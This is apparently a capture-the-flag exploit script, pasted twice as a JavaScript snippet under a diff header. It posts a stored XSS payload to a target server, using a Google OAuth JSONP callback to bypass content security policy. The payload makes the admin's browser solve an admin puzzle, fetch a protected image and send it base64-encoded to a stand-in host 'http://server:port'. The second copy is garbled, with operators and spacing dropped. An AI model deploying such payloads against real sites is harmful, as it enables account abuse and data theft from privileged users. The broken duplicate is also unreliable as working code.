strellic · February 28, 2021 09:07
diff --git a/notreceivedprize.js b/notreceivedprize.js
 let fn = function() {
   async function x() {
        let r = await fetch(`/api/admin/pz/ex`, { method: `POST` });
        let prob = (await r.json()).ex.split(' ');
        let a = parseInt(prob[0]), op = prob[1], b = parseInt(prob[2]);
        let ans = 0;
        if(op === '+') ans = a+b;
        if(op === '*') ans = a*b;
        if(op === '-') ans = a-b;
        if(op === '/') ans = a/b;
        let r2 = await fetch('/api/admin/pz/check', { method: 'POST', headers: {'content-type': 'application/json'}, body: JSON.stringify({solve: ans+''})});
        let img = (await r2.json()).img;
        let r3 = await fetch(img);
        let buf = await r3.arrayBuffer();
        let b64 = btoa(String.fromCharCode.apply(null, new Uint8Array(buf)));
        window.open('http://server:port?q=' + b64);
    }
    x();
 };
 fetch("http://151.236.114.211:13666/api/help/add", {
  "headers": {
    "accept": "application/json, text/plain, */*",
    "accept-language": "en-US,en;q=0.9",
    "cache-control": "no-cache",
    "content-type": "application/json;charset=UTF-8",
    "pragma": "no-cache"
  },
  "referrer": "http://151.236.114.211:13666/",
  "referrerPolicy": "strict-origin-when-cross-origin",
  "body": JSON.stringify(
    {"name":"sdfsdf","msg":`<script src=\"https://accounts.google.com/o/oauth2/revoke?callback=${encodeURIComponent(("("+fn.toString()+")()").replaceAll("\n", "").replaceAll("    ","").replaceAll("() => {", "function(){"))}\"<img>></scr<img>ipt>`,"captch":_.escape(document.getElementById('g-recaptcha-response')
 .value)}
  ),
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
 }).then(r => r.text()).then(console.log);
	let fn = function() {
	async function x() {
	let r = await fetch(`/api/admin/pz/ex`, { method: `POST` });
	let prob = (await r.json()).ex.split(' ');
	let a = parseInt(prob[0]), op = prob[1], b = parseInt(prob[2]);
	let ans = 0;
	if(op === '+') ans = a+b;
	if(op === '') ans = ab;
	if(op === '-') ans = a-b;
	if(op === '/') ans = a/b;
	let r2 = await fetch('/api/admin/pz/check', { method: 'POST', headers: {'content-type': 'application/json'}, body: JSON.stringify({solve: ans+''})});
	let img = (await r2.json()).img;
	let r3 = await fetch(img);
	let buf = await r3.arrayBuffer();
	let b64 = btoa(String.fromCharCode.apply(null, new Uint8Array(buf)));
	window.open('http://server:port?q=' + b64);
	}
	x();
	};
	fetch("http://151.236.114.211:13666/api/help/add", {
	"headers": {
	"accept": "application/json, text/plain, /",
	"accept-language": "en-US,en;q=0.9",
	"cache-control": "no-cache",
	"content-type": "application/json;charset=UTF-8",
	"pragma": "no-cache"
	},
	"referrer": "http://151.236.114.211:13666/",
	"referrerPolicy": "strict-origin-when-cross-origin",
	"body": JSON.stringify(
	{"name":"sdfsdf","msg":`<script src=\"https://accounts.google.com/o/oauth2/revoke?callback=${encodeURIComponent(("("+fn.toString()+")()").replaceAll("\n", "").replaceAll(" ","").replaceAll("() => {", "function(){"))}\"<img>></scr<img>ipt>`,"captch":_.escape(document.getElementById('g-recaptcha-response')
	.value)}
	),
	"method": "POST",
	"mode": "cors",
	"credentials": "include"
	}).then(r => r.text()).then(console.log);